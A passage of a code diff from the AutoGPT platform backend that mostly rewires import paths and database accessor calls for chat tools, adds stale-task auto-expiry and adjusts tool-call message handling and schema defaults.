@@ -1237,7 +1239,7 @@ async def _stream_chat_chunks(

                total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
                logger.info(
-                    f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
+                    f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
                    f"session={session.session_id}, user={session.user_id}",
                    extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
                )
@@ -1408,9 +1410,13 @@ async def _yield_tool_call(
                operation_id=operation_id,
            )

-            # Attach the tool_call to the current turn's assistant message
-            # (or create one if this is a tool-only response with no text).
-            session.add_tool_call_to_current_turn(tool_calls[yield_idx])
+            # Save assistant message with tool_call FIRST (required by LLM)
+            assistant_message = ChatMessage(
+                role="assistant",
+                content="",
+                tool_calls=[tool_calls[yield_idx]],
+            )
+            session.messages.append(assistant_message)

            # Then save pending tool result
            pending_message = ChatMessage(
@@ -1744,7 +1750,7 @@ async def _update_pending_operation(
    This is called by background tasks when long-running operations complete.
    """
    # Update the message in database
-    updated = await chat_db().update_tool_message_content(
+    updated = await chat_db.update_tool_message_content(
        session_id=session_id,
        tool_call_id=tool_call_id,
        new_content=result,
--- a/autogpt_platform/backend/backend/api/features/chat/service_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/service_test.py
--- a/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
+++ b/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
@@ -814,6 +814,28 @@ async def get_active_task_for_session(
                if task_user_id and user_id != task_user_id:
                    continue

+                # Auto-expire stale tasks that exceeded stream_timeout
+                created_at_str = meta.get("created_at", "")
+                if created_at_str:
+                    try:
+                        created_at = datetime.fromisoformat(created_at_str)
+                        age_seconds = (
+                            datetime.now(timezone.utc) - created_at
+                        ).total_seconds()
+                        if age_seconds > config.stream_timeout:
+                            logger.warning(
+                                f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
+                                f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
+                            )
+                            await mark_task_completed(task_id, "failed")
+                            continue
+                    except (ValueError, TypeError):
+                        pass
+
+                logger.info(
+                    f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
+                )
+
                # Get the last message ID from Redis Stream
                stream_key = _get_task_stream_key(task_id)
                last_id = "0-0"
--- a/autogpt_platform/backend/backend/api/features/chat/tools/IDEAS.md
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/IDEAS.md
--- a/autogpt_platform/backend/backend/api/features/chat/tools/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/init.py
@@ -3,8 +3,8 @@ from typing import TYPE_CHECKING, Any

 from openai.types.chat import ChatCompletionToolParam

-from backend.copilot.model import ChatSession
-from backend.copilot.tracking import track_tool_called
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tracking import track_tool_called

 from .add_understanding import AddUnderstandingTool
 from .agent_output import AgentOutputTool
@@ -27,7 +27,7 @@ from .workspace_files import (
 )

 if TYPE_CHECKING:
-    from backend.copilot.response_model import StreamToolOutputAvailable
+    from backend.api.features.chat.response_model import StreamToolOutputAvailable

 logger = logging.getLogger(__name__)

--- a/autogpt_platform/backend/backend/api/features/chat/tools/_test_data.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/_test_data.py
@@ -6,11 +6,11 @@ import pytest
 from prisma.types import ProfileCreateInput
 from pydantic import SecretStr

+from backend.api.features.chat.model import ChatSession
 from backend.api.features.store import db as store_db
 from backend.blocks.firecrawl.scrape import FirecrawlScrapeBlock
 from backend.blocks.io import AgentInputBlock, AgentOutputBlock
 from backend.blocks.llm import AITextGeneratorBlock
-from backend.copilot.model import ChatSession
 from backend.data.db import prisma
 from backend.data.graph import Graph, Link, Node, create_graph
 from backend.data.model import APIKeyCredentials
--- a/autogpt_platform/backend/backend/api/features/chat/tools/add_understanding.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/add_understanding.py
@@ -3,9 +3,11 @@
 import logging
 from typing import Any

-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import understanding_db
-from backend.data.understanding import BusinessUnderstandingInput
+from backend.api.features.chat.model import ChatSession
+from backend.data.understanding import (
+    BusinessUnderstandingInput,
+    upsert_business_understanding,
+)

 from .base import BaseTool
 from .models import ErrorResponse, ToolResponseBase, UnderstandingUpdatedResponse
@@ -97,9 +99,7 @@ and automations for the user's specific needs."""
        ]

        # Upsert with merge
-        understanding = await understanding_db().upsert_business_understanding(
-            user_id, input_data
-        )
+        understanding = await upsert_business_understanding(user_id, input_data)

        # Build current understanding summary (filter out empty values)
        current_understanding = {
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/init.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/core.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/core.py
@@ -5,8 +5,9 @@ import re
 import uuid
 from typing import Any, NotRequired, TypedDict

-from backend.data.db_accessors import graph_db, library_db, store_db
-from backend.data.graph import Graph, Link, Node
+from backend.api.features.library import db as library_db
+from backend.api.features.store import db as store_db
+from backend.data.graph import Graph, Link, Node, get_graph, get_store_listed_graphs
 from backend.util.exceptions import DatabaseError, NotFoundError

 from .service import (
@@ -144,9 +145,8 @@ async def get_library_agent_by_id(
    Returns:
        LibraryAgentSummary if found, None otherwise
    """
-    db = library_db()
    try:
-        agent = await db.get_library_agent_by_graph_id(user_id, agent_id)
+        agent = await library_db.get_library_agent_by_graph_id(user_id, agent_id)
        if agent:
            logger.debug(f"Found library agent by graph_id: {agent.name}")
            return LibraryAgentSummary(
@@ -163,7 +163,7 @@ async def get_library_agent_by_id(
        logger.debug(f"Could not fetch library agent by graph_id {agent_id}: {e}")

    try:
-        agent = await db.get_library_agent(agent_id, user_id)
+        agent = await library_db.get_library_agent(agent_id, user_id)
        if agent:
            logger.debug(f"Found library agent by library_id: {agent.name}")
            return LibraryAgentSummary(
@@ -215,7 +215,7 @@ async def get_library_agents_for_generation(
        List of LibraryAgentSummary with schemas and recent executions for sub-agent composition
    """
    try:
-        response = await library_db().list_library_agents(
+        response = await library_db.list_library_agents(
            user_id=user_id,
            search_term=search_query,
            page=1,
@@ -272,7 +272,7 @@ async def search_marketplace_agents_for_generation(
        List of LibraryAgentSummary with full input/output schemas
    """
    try:
-        response = await store_db().get_store_agents(
+        response = await store_db.get_store_agents(
            search_query=search_query,
            page=1,
            page_size=max_results,
@@ -286,7 +286,7 @@ async def search_marketplace_agents_for_generation(
            return []

        graph_ids = [agent.agent_graph_id for agent in agents_with_graphs]
-        graphs = await graph_db().get_store_listed_graphs(*graph_ids)
+        graphs = await get_store_listed_graphs(*graph_ids)

        results: list[LibraryAgentSummary] = []
        for agent in agents_with_graphs:
@@ -673,10 +673,9 @@ async def save_agent_to_library(
        Tuple of (created Graph, LibraryAgent)
    """
    graph = json_to_graph(agent_json)
-    db = library_db()
    if is_update:
-        return await db.update_graph_in_library(graph, user_id)
-    return await db.create_graph_in_library(graph, user_id)
+        return await library_db.update_graph_in_library(graph, user_id)
+    return await library_db.create_graph_in_library(graph, user_id)


 def graph_to_json(graph: Graph) -> dict[str, Any]:
@@ -736,14 +735,12 @@ async def get_agent_as_json(
    Returns:
        Agent as JSON dict or None if not found
    """
-    db = graph_db()
-
-    graph = await db.get_graph(agent_id, version=None, user_id=user_id)
+    graph = await get_graph(agent_id, version=None, user_id=user_id)

    if not graph and user_id:
        try:
-            library_agent = await library_db().get_library_agent(agent_id, user_id)
-            graph = await db.get_graph(
+            library_agent = await library_db.get_library_agent(agent_id, user_id)
+            graph = await get_graph(
                library_agent.graph_id, version=None, user_id=user_id
            )
        except NotFoundError:
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/errors.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/errors.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/service.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_output.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_output.py
@@ -7,9 +7,10 @@ from typing import Any

 from pydantic import BaseModel, field_validator

+from backend.api.features.chat.model import ChatSession
+from backend.api.features.library import db as library_db
 from backend.api.features.library.model import LibraryAgent
-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import execution_db, library_db
+from backend.data import execution as execution_db
 from backend.data.execution import ExecutionStatus, GraphExecution, GraphExecutionMeta

 from .base import BaseTool
@@ -164,12 +165,10 @@ class AgentOutputTool(BaseTool):
        Resolve agent from provided identifiers.
        Returns (library_agent, error_message).
        """
-        lib_db = library_db()
-
        # Priority 1: Exact library agent ID
        if library_agent_id:
            try:
-                agent = await lib_db.get_library_agent(library_agent_id, user_id)
+                agent = await library_db.get_library_agent(library_agent_id, user_id)
                return agent, None
            except Exception as e:
                logger.warning(f"Failed to get library agent by ID: {e}")
@@ -183,7 +182,7 @@ class AgentOutputTool(BaseTool):
                return None, f"Agent '{store_slug}' not found in marketplace"

            # Find in user's library by graph_id
-            agent = await lib_db.get_library_agent_by_graph_id(user_id, graph.id)
+            agent = await library_db.get_library_agent_by_graph_id(user_id, graph.id)
            if not agent:
                return (
                    None,
@@ -195,7 +194,7 @@ class AgentOutputTool(BaseTool):
        # Priority 3: Fuzzy name search in library
        if agent_name:
            try:
-                response = await lib_db.list_library_agents(
+                response = await library_db.list_library_agents(
                    user_id=user_id,
                    search_term=agent_name,
                    page_size=5,
@@ -229,11 +228,9 @@ class AgentOutputTool(BaseTool):
        Fetch execution(s) based on filters.
        Returns (single_execution, available_executions_meta, error_message).
        """
-        exec_db = execution_db()
-
        # If specific execution_id provided, fetch it directly
        if execution_id:
-            execution = await exec_db.get_graph_execution(
+            execution = await execution_db.get_graph_execution(
                user_id=user_id,
                execution_id=execution_id,
                include_node_executions=False,
@@ -243,7 +240,7 @@ class AgentOutputTool(BaseTool):
            return execution, [], None

        # Get completed executions with time filters
-        executions = await exec_db.get_graph_executions(
+        executions = await execution_db.get_graph_executions(
            graph_id=graph_id,
            user_id=user_id,
            statuses=[ExecutionStatus.COMPLETED],
@@ -257,7 +254,7 @@ class AgentOutputTool(BaseTool):

        # If only one execution, fetch full details
        if len(executions) == 1:
-            full_execution = await exec_db.get_graph_execution(
+            full_execution = await execution_db.get_graph_execution(
                user_id=user_id,
                execution_id=executions[0].id,
                include_node_executions=False,
@@ -265,7 +262,7 @@ class AgentOutputTool(BaseTool):
            return full_execution, [], None

        # Multiple executions - return latest with full details, plus list of available
-        full_execution = await exec_db.get_graph_execution(
+        full_execution = await execution_db.get_graph_execution(
            user_id=user_id,
            execution_id=executions[0].id,
            include_node_executions=False,
@@ -383,7 +380,7 @@ class AgentOutputTool(BaseTool):
            and not input_data.store_slug
        ):
            # Fetch execution directly to get graph_id
-            execution = await execution_db().get_graph_execution(
+            execution = await execution_db.get_graph_execution(
                user_id=user_id,
                execution_id=input_data.execution_id,
                include_node_executions=False,
@@ -395,7 +392,7 @@ class AgentOutputTool(BaseTool):
                )

            # Find library agent by graph_id
-            agent = await library_db().get_library_agent_by_graph_id(
+            agent = await library_db.get_library_agent_by_graph_id(
                user_id, execution.graph_id
            )
            if not agent:
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_search.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_search.py
@@ -4,7 +4,8 @@ import logging
 import re
 from typing import Literal

-from backend.data.db_accessors import library_db, store_db
+from backend.api.features.library import db as library_db
+from backend.api.features.store import db as store_db
 from backend.util.exceptions import DatabaseError, NotFoundError

 from .models import (
@@ -44,10 +45,8 @@ async def _get_library_agent_by_id(user_id: str, agent_id: str) -> AgentInfo | N
    Returns:
        AgentInfo if found, None otherwise
    """
-    lib_db = library_db()
-
    try:
-        agent = await lib_db.get_library_agent_by_graph_id(user_id, agent_id)
+        agent = await library_db.get_library_agent_by_graph_id(user_id, agent_id)
        if agent:
            logger.debug(f"Found library agent by graph_id: {agent.name}")
            return AgentInfo(
@@ -72,7 +71,7 @@ async def _get_library_agent_by_id(user_id: str, agent_id: str) -> AgentInfo | N
        )

    try:
-        agent = await lib_db.get_library_agent(agent_id, user_id)
+        agent = await library_db.get_library_agent(agent_id, user_id)
        if agent:
            logger.debug(f"Found library agent by library_id: {agent.name}")
            return AgentInfo(
@@ -134,7 +133,7 @@ async def search_agents(
    try:
        if source == "marketplace":
            logger.info(f"Searching marketplace for: {query}")
-            results = await store_db().get_store_agents(search_query=query, page_size=5)
+            results = await store_db.get_store_agents(search_query=query, page_size=5)
            for agent in results.agents:
                agents.append(
                    AgentInfo(
@@ -160,7 +159,7 @@ async def search_agents(

            if not agents:
                logger.info(f"Searching user library for: {query}")
-                results = await library_db().list_library_agents(
+                results = await library_db.list_library_agents(
                    user_id=user_id,  # type: ignore[arg-type]
                    search_term=query,
                    page_size=10,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/base.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/base.py
@@ -5,8 +5,8 @@ from typing import Any

 from openai.types.chat import ChatCompletionToolParam

-from backend.copilot.model import ChatSession
-from backend.copilot.response_model import StreamToolOutputAvailable
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.response_model import StreamToolOutputAvailable

 from .models import ErrorResponse, NeedLoginResponse, ToolResponseBase

--- a/autogpt_platform/backend/backend/api/features/chat/tools/create_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/create_agent.py
@@ -3,7 +3,7 @@
 import logging
 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_generator import (
    AgentGeneratorNotConfiguredError,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/customize_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/customize_agent.py
@@ -3,9 +3,9 @@
 import logging
 from typing import Any

+from backend.api.features.chat.model import ChatSession
+from backend.api.features.store import db as store_db
 from backend.api.features.store.exceptions import AgentNotFoundError
-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import store_db as get_store_db

 from .agent_generator import (
    AgentGeneratorNotConfiguredError,
@@ -137,8 +137,6 @@ class CustomizeAgentTool(BaseTool):

        creator_username, agent_slug = parts

-        store_db = get_store_db()
-
        # Fetch the marketplace agent details
        try:
            agent_details = await store_db.get_store_agent_details(
--- a/autogpt_platform/backend/backend/api/features/chat/tools/edit_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/edit_agent.py
@@ -3,7 +3,7 @@
 import logging
 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_generator import (
    AgentGeneratorNotConfiguredError,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_agent.py
@@ -2,7 +2,7 @@

 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_search import search_agents
 from .base import BaseTool
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
@@ -3,18 +3,17 @@ from typing import Any

 from prisma.enums import ContentType

-from backend.blocks import get_block
-from backend.blocks._base import BlockType
-from backend.copilot.model import ChatSession
-from backend.copilot.tools.base import BaseTool, ToolResponseBase
-from backend.copilot.tools.models import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.base import BaseTool, ToolResponseBase
+from backend.api.features.chat.tools.models import (
    BlockInfoSummary,
    BlockInputFieldInfo,
    BlockListResponse,
    ErrorResponse,
    NoResultsResponse,
 )
-from backend.data.db_accessors import search
+from backend.api.features.store.hybrid_search import unified_hybrid_search
+from backend.data.block import BlockType, get_block

 logger = logging.getLogger(__name__)

@@ -107,7 +106,7 @@ class FindBlockTool(BaseTool):

        try:
            # Search for blocks using hybrid search
-            results, total = await search().unified_hybrid_search(
+            results, total = await unified_hybrid_search(
                query=query,
                content_types=[ContentType.BLOCK],
                page=1,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
@@ -4,13 +4,13 @@ from unittest.mock import AsyncMock, MagicMock, patch

 import pytest

-from backend.blocks._base import BlockType
-from backend.copilot.tools.find_block import (
+from backend.api.features.chat.tools.find_block import (
    COPILOT_EXCLUDED_BLOCK_IDS,
    COPILOT_EXCLUDED_BLOCK_TYPES,
    FindBlockTool,
 )
-from backend.copilot.tools.models import BlockListResponse
+from backend.api.features.chat.tools.models import BlockListResponse
+from backend.data.block import BlockType

 from ._test_data import make_session

@@ -76,12 +76,12 @@ class TestFindBlockFiltering:
            }.get(block_id)

        with patch(
-            "backend.copilot.tools.find_block.unified_hybrid_search",
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
            new_callable=AsyncMock,
            return_value=(search_results, 2),
        ):
            with patch(
-                "backend.copilot.tools.find_block.get_block",
+                "backend.api.features.chat.tools.find_block.get_block",
                side_effect=mock_get_block,
            ):
                tool = FindBlockTool()
@@ -120,12 +120,12 @@ class TestFindBlockFiltering:
            }.get(block_id)

        with patch(
-            "backend.copilot.tools.find_block.unified_hybrid_search",
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
            new_callable=AsyncMock,
            return_value=(search_results, 2),
        ):
            with patch(
-                "backend.copilot.tools.find_block.get_block",
+                "backend.api.features.chat.tools.find_block.get_block",
                side_effect=mock_get_block,
            ):
                tool = FindBlockTool()
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_library_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_library_agent.py
@@ -2,7 +2,7 @@

 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_search import search_agents
 from .base import BaseTool
--- a/autogpt_platform/backend/backend/api/features/chat/tools/get_doc_page.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/get_doc_page.py
@@ -4,9 +4,9 @@ import logging
 from pathlib import Path
 from typing import Any

-from backend.copilot.model import ChatSession
-from backend.copilot.tools.base import BaseTool
-from backend.copilot.tools.models import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.base import BaseTool
+from backend.api.features.chat.tools.models import (
    DocPageResponse,
    ErrorResponse,
    ToolResponseBase,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/models.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/models.py
@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
    name: str
    description: str
    categories: list[str]
-    input_schema: dict[str, Any]
-    output_schema: dict[str, Any]
+    input_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block inputs",
+    )
+    output_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block outputs",
+    )
    required_inputs: list[BlockInputFieldInfo] = Field(
        default_factory=list,
-        description="List of required input fields for this block",
+        description="List of input fields for this block",
    )


@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
    query: str
    usage_hint: str = Field(
        default="To execute a block, call run_block with block_id set to the block's "
-        "'id' field and input_data containing the required fields from input_schema."
+        "'id' field and input_data containing the fields listed in required_inputs."
    )


--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
@@ -5,12 +5,16 @@ from typing import Any

 from pydantic import BaseModel, Field, field_validator

-from backend.copilot.config import ChatConfig
-from backend.copilot.model import ChatSession
-from backend.copilot.tracking import track_agent_run_success, track_agent_scheduled
-from backend.data.db_accessors import graph_db, library_db, user_db
+from backend.api.features.chat.config import ChatConfig
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tracking import (
+    track_agent_run_success,
+    track_agent_scheduled,
+)
+from backend.api.features.library import db as library_db
 from backend.data.graph import GraphModel
 from backend.data.model import CredentialsMetaInput
+from backend.data.user import get_user_by_id
 from backend.executor import utils as execution_utils
 from backend.util.clients import get_scheduler_client
 from backend.util.exceptions import DatabaseError, NotFoundError
@@ -196,7 +200,7 @@ class RunAgentTool(BaseTool):

            # Priority: library_agent_id if provided
            if has_library_id:
-                library_agent = await library_db().get_library_agent(
+                library_agent = await library_db.get_library_agent(
                    params.library_agent_id, user_id
                )
                if not library_agent:
@@ -205,7 +209,9 @@ class RunAgentTool(BaseTool):
                        session_id=session_id,
                    )
                # Get the graph from the library agent
-                graph = await graph_db().get_graph(
+                from backend.data.graph import get_graph
+
+                graph = await get_graph(
                    library_agent.graph_id,
                    library_agent.graph_version,
                    user_id=user_id,
@@ -516,7 +522,7 @@ class RunAgentTool(BaseTool):
        library_agent = await get_or_create_library_agent(graph, user_id)

        # Get user timezone
-        user = await user_db().get_user_by_id(user_id)
+        user = await get_user_by_id(user_id)
        user_timezone = get_user_timezone_or_utc(user.timezone if user else timezone)

        # Create schedule
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_agent_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_agent_test.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
@@ -7,16 +7,15 @@ from typing import Any

 from pydantic_core import PydanticUndefined

-from backend.blocks import get_block
-from backend.blocks._base import AnyBlockSchema
-from backend.copilot.model import ChatSession
-from backend.copilot.tools.find_block import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.find_block import (
    COPILOT_EXCLUDED_BLOCK_IDS,
    COPILOT_EXCLUDED_BLOCK_TYPES,
 )
-from backend.data.db_accessors import workspace_db
+from backend.data.block import AnyBlockSchema, get_block
 from backend.data.execution import ExecutionContext
 from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
+from backend.data.workspace import get_or_create_workspace
 from backend.integrations.creds_manager import IntegrationCredentialsManager
 from backend.util.exceptions import BlockError

@@ -190,7 +189,7 @@ class RunBlockTool(BaseTool):

        try:
            # Get or create user's workspace for CoPilot file operations
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)

            # Generate synthetic IDs for CoPilot context
            # Each chat session is treated as its own agent with one continuous run
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
@@ -4,9 +4,9 @@ from unittest.mock import MagicMock, patch

 import pytest

-from backend.blocks._base import BlockType
-from backend.copilot.tools.models import ErrorResponse
-from backend.copilot.tools.run_block import RunBlockTool
+from backend.api.features.chat.tools.models import ErrorResponse
+from backend.api.features.chat.tools.run_block import RunBlockTool
+from backend.data.block import BlockType

 from ._test_data import make_session

@@ -39,7 +39,7 @@ class TestRunBlockFiltering:
        input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)

        with patch(
-            "backend.copilot.tools.run_block.get_block",
+            "backend.api.features.chat.tools.run_block.get_block",
            return_value=input_block,
        ):
            tool = RunBlockTool()
@@ -65,7 +65,7 @@ class TestRunBlockFiltering:
        )

        with patch(
-            "backend.copilot.tools.run_block.get_block",
+            "backend.api.features.chat.tools.run_block.get_block",
            return_value=smart_block,
        ):
            tool = RunBlockTool()
@@ -89,7 +89,7 @@ class TestRunBlockFiltering:
        )

        with patch(
-            "backend.copilot.tools.run_block.get_block",
+            "backend.api.features.chat.tools.run_block.get_block",
            return_value=standard_block,
        ):
            tool = RunBlockTool()
--- a/autogpt_platform/backend/backend/api/features/chat/tools/search_docs.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/search_docs.py
@@ -5,16 +5,16 @@ from typing import Any

 from prisma.enums import ContentType

-from backend.copilot.model import ChatSession
-from backend.copilot.tools.base import BaseTool
-from backend.copilot.tools.models import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.base import BaseTool
+from backend.api.features.chat.tools.models import (
    DocSearchResult,
    DocSearchResultsResponse,
    ErrorResponse,
    NoResultsResponse,
    ToolResponseBase,
 )
-from backend.data.db_accessors import search
+from backend.api.features.store.hybrid_search import unified_hybrid_search

 logger = logging.getLogger(__name__)

@@ -117,7 +117,7 @@ class SearchDocsTool(BaseTool):

        try:
            # Search using hybrid search for DOCUMENTATION content type only
-            results, total = await search().unified_hybrid_search(
+            results, total = await unified_hybrid_search(
                query=query,
                content_types=[ContentType.DOCUMENTATION],
                page=1,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
@@ -3,8 +3,9 @@
 import logging
 from typing import Any

+from backend.api.features.library import db as library_db
 from backend.api.features.library import model as library_model
-from backend.data.db_accessors import library_db, store_db
+from backend.api.features.store import db as store_db
 from backend.data.graph import GraphModel
 from backend.data.model import (
    Credentials,
@@ -37,14 +38,13 @@ async def fetch_graph_from_store_slug(
    Raises:
        DatabaseError: If there's a database error during lookup.
    """
-    sdb = store_db()
    try:
-        store_agent = await sdb.get_store_agent_details(username, agent_name)
+        store_agent = await store_db.get_store_agent_details(username, agent_name)
    except NotFoundError:
        return None, None

    # Get the graph from store listing version
-    graph = await sdb.get_available_graph(
+    graph = await store_db.get_available_graph(
        store_agent.store_listing_version_id, hide_nodes=False
    )
    return graph, store_agent
@@ -209,13 +209,13 @@ async def get_or_create_library_agent(
    Returns:
        LibraryAgent instance
    """
-    existing = await library_db().get_library_agent_by_graph_id(
+    existing = await library_db.get_library_agent_by_graph_id(
        graph_id=graph.id, user_id=user_id
    )
    if existing:
        return existing

-    library_agents = await library_db().create_library_agent(
+    library_agents = await library_db.create_library_agent(
        graph=graph,
        user_id=user_id,
        create_library_agents_for_sub_graphs=False,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/workspace_files.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/workspace_files.py
@@ -6,8 +6,8 @@ from typing import Any, Optional

 from pydantic import BaseModel

-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import workspace_db
+from backend.api.features.chat.model import ChatSession
+from backend.data.workspace import get_or_create_workspace
 from backend.util.settings import Config
 from backend.util.virus_scanner import scan_content_safe
 from backend.util.workspace import WorkspaceManager
@@ -146,7 +146,7 @@ class ListWorkspaceFilesTool(BaseTool):
        include_all_sessions: bool = kwargs.get("include_all_sessions", False)

        try:
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

@@ -280,7 +280,7 @@ class ReadWorkspaceFileTool(BaseTool):
            )

        try:
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

@@ -478,7 +478,7 @@ class WriteWorkspaceFileTool(BaseTool):
            # Virus scan
            await scan_content_safe(content, filename=filename)

-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

@@ -577,7 +577,7 @@ class DeleteWorkspaceFileTool(BaseTool):
            )

        try:
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

--- a/autogpt_platform/backend/backend/api/features/chat/tracking.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tracking.py
--- a/autogpt_platform/backend/backend/api/features/library/db.py
+++ b/autogpt_platform/backend/backend/api/features/library/db.py
@@ -12,11 +12,12 @@ import backend.api.features.store.image_gen as store_image_gen
 import backend.api.features.store.media as store_media
 import backend.data.graph as graph_db
 import backend.data.integrations as integrations_db
+from backend.data.block import BlockInput
 from backend.data.db import transaction
 from backend.data.execution import get_graph_execution
 from backend.data.graph import GraphSettings
 from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
-from backend.data.model import CredentialsMetaInput, GraphInput
+from backend.data.model import CredentialsMetaInput
 from backend.integrations.creds_manager import IntegrationCredentialsManager
 from backend.integrations.webhooks.graph_lifecycle_hooks import (
    on_graph_activate,
@@ -1129,7 +1130,7 @@ async def create_preset_from_graph_execution(
 async def update_preset(
    user_id: str,
    preset_id: str,
-    inputs: Optional[GraphInput] = None,
+    inputs: Optional[BlockInput] = None,
    credentials: Optional[dict[str, CredentialsMetaInput]] = None,
    name: Optional[str] = None,
    description: Optional[str] = None,
--- a/autogpt_platform/backend/backend/api/features/library/model.py
+++ b/autogpt_platform/backend/backend/api/features/library/model.py
@@ -6,12 +6,9 @@ import prisma.enums
 import prisma.models
 import pydantic

+from backend.data.block import BlockInput
 from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
-from backend.data.model import (
-    CredentialsMetaInput,
-    GraphInput,
-    is_credentials_field_name,
-)
+from backend.data.model import CredentialsMetaInput, is_credentials_field_name
 from backend.util.json import loads as json_loads
 from backend.util.models import Pagination

@@ -326,7 +323,7 @@ class LibraryAgentPresetCreatable(pydantic.BaseModel):
    graph_id: str
    graph_version: int

-    inputs: GraphInput
+    inputs: BlockInput
    credentials: dict[str, CredentialsMetaInput]

    name: str
@@ -355,7 +352,7 @@ class LibraryAgentPresetUpdatable(pydantic.BaseModel):
    Request model used when updating a preset for a library agent.
    """

-    inputs: Optional[GraphInput] = None
